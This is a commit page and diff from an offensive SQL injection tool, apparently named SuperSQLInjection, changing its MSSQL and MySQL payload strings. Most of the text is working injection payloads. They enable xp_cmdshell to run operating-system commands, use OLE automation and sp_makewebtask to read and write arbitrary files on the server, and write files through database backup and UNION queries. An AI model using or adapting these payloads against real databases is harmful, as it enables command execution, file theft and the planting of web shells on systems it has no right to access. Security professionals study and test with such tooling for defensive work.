shack2/SuperSQLInjectionV1
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update20181117

Browse Source 
20181117 V1.0 正式版---
库表列新增全选和反选功能。
优化底部日志显示,增加色彩。
修改配置文件,优化payload语句以及测试语句,提高自动识别准确率,降低误报和漏报。
注意:此版本开始注入标记不在是替换and 1=1,而且替换1=1这个位置的语句,所以在手工标记时,记得保留and或者or。
This commit is contained in:
shack2
2018-11-17 01:28:02 +08:00
parent 96b29a6a84
commit 325337b13d
6 changed files with 261 additions and 245 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
SuperSQLInjection/payload/MSSQL.cs
View File

@@ -69,17 +69,17 @@ namespace SuperSQLInjection.payload
//cmd
public static String createTable = ";drop table ssqlinjection;create table ssqlinjection(id int primary key identity,data varchar(8000));exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;declare @cmd varchar(8000);set @cmd={cmd};insert into ssqlinjection(data) exec [master]..[xp_cmdshell] @cmd--";
public static String createTable = " 1=1;drop table ssqlinjection;create table ssqlinjection(id int primary key identity,data varchar(8000));exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;declare @cmd varchar(8000);set @cmd={cmd};insert into ssqlinjection(data) exec [master]..[xp_cmdshell] @cmd--";
public static String cmdData = "cast((select top 1 data from ssqlinjection where id={index}) as varchar(8000))";
public static String cmdDataCount = "(select count(*) from ssqlinjection)";
public static String dropTable = ";drop table ssqlinjection;--";
public static String dropTable = " 1=1;drop table ssqlinjection;--";
//文件读写
public static String witeFileByFileSystemObject = ";exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);set @data={data};declare @path varchar(4000);set @path={path};exec [master]..[sp_oacreate] 'scripting.fileSystemObject',@object out;exec [master]..[sp_oamethod] @object,'createtextfile',@file output,@path;exec [master]..[sp_oamethod] @file,'write',null,@data;exec [master]..[sp_oamethod] @file,'close',null;--";
public static String witeFileBySP_MakeWebTask = ";exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'web assistant procedures',1;reconfigure;declare @d varchar(8000);set @d={data};declare @p varchar(4000);set @p={path};exec sp_makewebtask @p, @d;--";
public static String witeFileByBackDataBase = ";drop database ssqlinjection;create database ssqlinjection;drop table [ssqlinjection]..[data];create table [ssqlinjection]..[data] (content image);insert into [ssqlinjection]..[data](content) values({data});declare @s varchar(8000);set @s={path} backup database ssqlinjection to disk=@s;--";
public static String readFileByFileSystemobject = ";exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);exec [master]..[sp_oacreate] 'scripting.filesystemobject',@object out;exec [master]..[sp_oamethod] @object,'OpenTextFile',@file output,'{path}';drop table ssqlinjection;create table ssqlinjection (data varchar(8000));exec [master]..[sp_oamethod] @file,'read',@data out,8000;insert into ssqlinjection(data) values(@data);--";
public static String witeFileByFileSystemObject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);set @data={data};declare @path varchar(4000);set @path={path};exec [master]..[sp_oacreate] 'scripting.fileSystemObject',@object out;exec [master]..[sp_oamethod] @object,'createtextfile',@file output,@path;exec [master]..[sp_oamethod] @file,'write',null,@data;exec [master]..[sp_oamethod] @file,'close',null;--";
public static String witeFileBySP_MakeWebTask = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'web assistant procedures',1;reconfigure;declare @d varchar(8000);set @d={data};declare @p varchar(4000);set @p={path};exec sp_makewebtask @p, @d;--";
public static String witeFileByBackDataBase = " 1=1;drop database ssqlinjection;create database ssqlinjection;drop table [ssqlinjection]..[data];create table [ssqlinjection]..[data] (content image);insert into [ssqlinjection]..[data](content) values({data});declare @s varchar(8000);set @s={path} backup database ssqlinjection to disk=@s;--";
public static String readFileByFileSystemobject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);exec [master]..[sp_oacreate] 'scripting.filesystemobject',@object out;exec [master]..[sp_oamethod] @object,'OpenTextFile',@file output,'{path}';drop table ssqlinjection;create table ssqlinjection (data varchar(8000));exec [master]..[sp_oamethod] @file,'read',@data out,8000;insert into ssqlinjection(data) values(@data);--";
//读文件的的payload
public static String file_content = "(select data from ssqlinjection)";

2
SuperSQLInjection/payload/MySQL5.cs
View File

@@ -161,7 +161,7 @@ namespace SuperSQLInjection.payload
public static String creatMySQLWriteFileByUnion(int columnsLen, int dataIndex,String fill, String path,String content)
{
StringBuilder sb = new StringBuilder(" union select ");
StringBuilder sb = new StringBuilder(" 1=1 union select ");
for (int i = 1; i <= columnsLen; i++)
{